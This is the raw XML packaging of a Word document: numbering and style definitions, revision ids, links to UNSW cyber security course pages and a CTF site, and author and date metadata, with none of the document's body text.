      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="64161FD8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0928C48C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B4628D5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EE84FC2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A606B80C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="64576364">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="548495595">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2077703631">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1117984316">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="11293203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A. Gosman">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="0c59b39ae9c4ee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8583FD"/>
    <w:rsid w:val="0002725D"/>
    <w:rsid w:val="00031E5F"/>
    <w:rsid w:val="000439B8"/>
    <w:rsid w:val="000B00DE"/>
    <w:rsid w:val="00105939"/>
    <w:rsid w:val="00163D99"/>
    <w:rsid w:val="0018464D"/>
    <w:rsid w:val="00214FA8"/>
    <w:rsid w:val="002963B1"/>
    <w:rsid w:val="002A2112"/>
    <w:rsid w:val="002D1807"/>
    <w:rsid w:val="002F080E"/>
    <w:rsid w:val="003123C6"/>
    <w:rsid w:val="003317F4"/>
    <w:rsid w:val="003567E5"/>
    <w:rsid w:val="0038476D"/>
    <w:rsid w:val="003A1FD7"/>
    <w:rsid w:val="003A4F61"/>
    <w:rsid w:val="003F1846"/>
    <w:rsid w:val="00433997"/>
    <w:rsid w:val="004458A6"/>
    <w:rsid w:val="00473801"/>
    <w:rsid w:val="00487CBB"/>
    <w:rsid w:val="004C66A1"/>
    <w:rsid w:val="004D16C5"/>
    <w:rsid w:val="00553FBC"/>
    <w:rsid w:val="005617B7"/>
    <w:rsid w:val="005656F6"/>
    <w:rsid w:val="0058592F"/>
    <w:rsid w:val="005A08DC"/>
    <w:rsid w:val="005B73AE"/>
    <w:rsid w:val="006157CB"/>
    <w:rsid w:val="006576AD"/>
    <w:rsid w:val="006665A1"/>
    <w:rsid w:val="00717063"/>
    <w:rsid w:val="007B4CBA"/>
    <w:rsid w:val="007C100A"/>
    <w:rsid w:val="00831FB7"/>
    <w:rsid w:val="008825CF"/>
    <w:rsid w:val="008A7E74"/>
    <w:rsid w:val="008B59EF"/>
    <w:rsid w:val="00901E67"/>
    <w:rsid w:val="00903D82"/>
    <w:rsid w:val="0098788C"/>
    <w:rsid w:val="009D10E4"/>
    <w:rsid w:val="00A1213F"/>
    <w:rsid w:val="00A13563"/>
    <w:rsid w:val="00A5771B"/>
    <w:rsid w:val="00A90EF5"/>
    <w:rsid w:val="00AB26CD"/>
    <w:rsid w:val="00AC1CEF"/>
    <w:rsid w:val="00AE14A7"/>
    <w:rsid w:val="00B55423"/>
    <w:rsid w:val="00B9480E"/>
    <w:rsid w:val="00B9509C"/>
    <w:rsid w:val="00C068A8"/>
    <w:rsid w:val="00C27111"/>
    <w:rsid w:val="00C536AF"/>
    <w:rsid w:val="00C54874"/>
    <w:rsid w:val="00CA4D29"/>
    <w:rsid w:val="00D44FAA"/>
    <w:rsid w:val="00D83FA9"/>
    <w:rsid w:val="00DE490B"/>
    <w:rsid w:val="00E003A3"/>
    <w:rsid w:val="00E05570"/>
    <w:rsid w:val="00E36FBA"/>
    <w:rsid w:val="00E45EA2"/>
    <w:rsid w:val="00E56622"/>
    <w:rsid w:val="00E838A9"/>
    <w:rsid w:val="00E91064"/>
    <w:rsid w:val="00E9362C"/>
    <w:rsid w:val="00EB538C"/>
    <w:rsid w:val="00ED5F6D"/>
    <w:rsid w:val="00EF26E3"/>
    <w:rsid w:val="00F042BF"/>
    <w:rsid w:val="00F12C98"/>
    <w:rsid w:val="00F1361F"/>
    <w:rsid w:val="00F33663"/>
    <w:rsid w:val="00F5572B"/>
    <w:rsid w:val="00F94604"/>
    <w:rsid w:val="00FA64B7"/>
    <w:rsid w:val="00FB0A49"/>
    <w:rsid w:val="00FB2563"/>
    <w:rsid w:val="0142DCDE"/>
    <w:rsid w:val="018EE3D7"/>
    <w:rsid w:val="019AD614"/>
    <w:rsid w:val="02E3CFBE"/>
    <w:rsid w:val="0546131A"/>
    <w:rsid w:val="0600612C"/>
    <w:rsid w:val="06B17308"/>
    <w:rsid w:val="078AB874"/>
    <w:rsid w:val="08C796BA"/>
    <w:rsid w:val="0DA0FC93"/>
    <w:rsid w:val="0E2B4E8C"/>
    <w:rsid w:val="0E407A08"/>
    <w:rsid w:val="0E559CEF"/>
    <w:rsid w:val="1098DFCA"/>
    <w:rsid w:val="12997F7D"/>
    <w:rsid w:val="13D4C4C5"/>
    <w:rsid w:val="141A93D7"/>
    <w:rsid w:val="14E6EADD"/>
    <w:rsid w:val="1503DF44"/>
    <w:rsid w:val="155554D3"/>
    <w:rsid w:val="15928116"/>
    <w:rsid w:val="16168886"/>
    <w:rsid w:val="169D7522"/>
    <w:rsid w:val="181B8E52"/>
    <w:rsid w:val="186127A6"/>
    <w:rsid w:val="1AE53E51"/>
    <w:rsid w:val="1B35AEF7"/>
    <w:rsid w:val="1B8583FD"/>
    <w:rsid w:val="1C43A36D"/>
    <w:rsid w:val="1C8EE1DB"/>
    <w:rsid w:val="1CC00C75"/>
    <w:rsid w:val="1D136FCE"/>
    <w:rsid w:val="1FE2BA0C"/>
    <w:rsid w:val="20427107"/>
    <w:rsid w:val="21633C8C"/>
    <w:rsid w:val="21A91BA0"/>
    <w:rsid w:val="23DCD9F8"/>
    <w:rsid w:val="25F34E4C"/>
    <w:rsid w:val="2890882B"/>
    <w:rsid w:val="29C051EC"/>
    <w:rsid w:val="2ACF105E"/>
    <w:rsid w:val="2B194D2C"/>
    <w:rsid w:val="2B29D56B"/>
    <w:rsid w:val="2C039CBC"/>
    <w:rsid w:val="2C2B811B"/>
    <w:rsid w:val="2C4FC874"/>
    <w:rsid w:val="2CF98C07"/>
    <w:rsid w:val="2D55BC5E"/>
    <w:rsid w:val="2D6900C1"/>
    <w:rsid w:val="2E6E7AC1"/>
    <w:rsid w:val="2F3A1CC1"/>
    <w:rsid w:val="30B419A8"/>
    <w:rsid w:val="30DB412C"/>
    <w:rsid w:val="30F1F342"/>
    <w:rsid w:val="316224EB"/>
    <w:rsid w:val="3297DC1F"/>
    <w:rsid w:val="336AB2E5"/>
    <w:rsid w:val="35222D9E"/>
    <w:rsid w:val="371C62D3"/>
    <w:rsid w:val="3722A2DC"/>
    <w:rsid w:val="3730D899"/>
    <w:rsid w:val="37D07EEC"/>
    <w:rsid w:val="382CF1D2"/>
    <w:rsid w:val="391D54D3"/>
    <w:rsid w:val="39809BE9"/>
    <w:rsid w:val="398470B6"/>
    <w:rsid w:val="3B0F2F59"/>
    <w:rsid w:val="3B3B092D"/>
    <w:rsid w:val="3C2776BD"/>
    <w:rsid w:val="3C56E03E"/>
    <w:rsid w:val="3D9D0607"/>
    <w:rsid w:val="3E737628"/>
    <w:rsid w:val="3F2B0098"/>
    <w:rsid w:val="3F828AD0"/>
    <w:rsid w:val="41548045"/>
    <w:rsid w:val="42A57885"/>
    <w:rsid w:val="42D4980C"/>
    <w:rsid w:val="42E83AC9"/>
    <w:rsid w:val="43A14A5A"/>
    <w:rsid w:val="44908FCC"/>
    <w:rsid w:val="45ACF387"/>
    <w:rsid w:val="4616B9A0"/>
    <w:rsid w:val="4657ADB4"/>
    <w:rsid w:val="46CD8C25"/>
    <w:rsid w:val="46FCCB50"/>
    <w:rsid w:val="4754C4D8"/>
    <w:rsid w:val="4A6EB47B"/>
    <w:rsid w:val="4C7EF474"/>
    <w:rsid w:val="4C8FA85B"/>
    <w:rsid w:val="50317446"/>
    <w:rsid w:val="511C71F7"/>
    <w:rsid w:val="5146400E"/>
    <w:rsid w:val="51A4F042"/>
    <w:rsid w:val="52A3F398"/>
    <w:rsid w:val="53506ABB"/>
    <w:rsid w:val="536A708A"/>
    <w:rsid w:val="53B92277"/>
    <w:rsid w:val="543CD94A"/>
    <w:rsid w:val="55216E6C"/>
    <w:rsid w:val="55390D8F"/>
    <w:rsid w:val="5557D4A9"/>
    <w:rsid w:val="5590C850"/>
    <w:rsid w:val="55D0B4D2"/>
    <w:rsid w:val="566E02A6"/>
    <w:rsid w:val="592CA103"/>
    <w:rsid w:val="59BFA03D"/>
    <w:rsid w:val="5AF8CDE6"/>
    <w:rsid w:val="5C182900"/>
    <w:rsid w:val="5ED7D080"/>
    <w:rsid w:val="5F245F19"/>
    <w:rsid w:val="60E4267D"/>
    <w:rsid w:val="61EF3C9A"/>
    <w:rsid w:val="62319522"/>
    <w:rsid w:val="62CCBAE5"/>
    <w:rsid w:val="64F38000"/>
    <w:rsid w:val="6513D53F"/>
    <w:rsid w:val="6685B08B"/>
    <w:rsid w:val="66F26DFD"/>
    <w:rsid w:val="6816F7BF"/>
    <w:rsid w:val="68CB2D18"/>
    <w:rsid w:val="6AF0240F"/>
    <w:rsid w:val="6B214FDA"/>
    <w:rsid w:val="6C33C20C"/>
    <w:rsid w:val="6C805450"/>
    <w:rsid w:val="6E78A25E"/>
    <w:rsid w:val="703CBDFD"/>
    <w:rsid w:val="714DC6FA"/>
    <w:rsid w:val="72655377"/>
    <w:rsid w:val="73EA0038"/>
    <w:rsid w:val="798B5A01"/>
    <w:rsid w:val="7B7E572D"/>
    <w:rsid w:val="7BD61530"/>
    <w:rsid w:val="7BD990C2"/>
    <w:rsid w:val="7C7DC266"/>
    <w:rsid w:val="7CF86664"/>
    <w:rsid w:val="7D1EA43D"/>
    <w:rsid w:val="7DC3C52F"/>
    <w:rsid w:val="7DEE4269"/>
    <w:rsid w:val="7E62B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691B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{18986F5A-F1D7-43F9-AB01-01E77314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rsid w:val="181B8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1B8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181B8E5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9C051EC"/>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181B8E52"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="181B8E5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42D4980C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="42D4980C"/>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AB26CD"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00903D82"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="css-emb99l">
    <w:name w:val="css-emb99l"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00903D82"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:lang w:eastAsia="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00903D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learning.com/unswcourses/courses/cyber-security-engineering-2026-t2/securityeverywhere/securityeverywhere3/?cl=1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/cognitivevulns/?cl=1" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cpubenchmark.net/common_cpus.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cpubenchmark.net/laptop.html"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openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/attackerwork/?cl=1" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/casestudies/week-3-houdini-prep/?cl=1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/enigma/?cl=1" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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ctfd.comp6841.xyz/"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nature-com.wwwproxy1.library.unsw.edu.au/articles/d41586-021-02634-z"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3D053-01F1-4C63-B5AF-1F2B15F5D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8</Pages>
  <Words>1294</Words>
  <Characters>7313</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>348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Thomas A. Gosman</cp:lastModifiedBy>
  <cp:revision>67</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-28T06:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-20T05:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>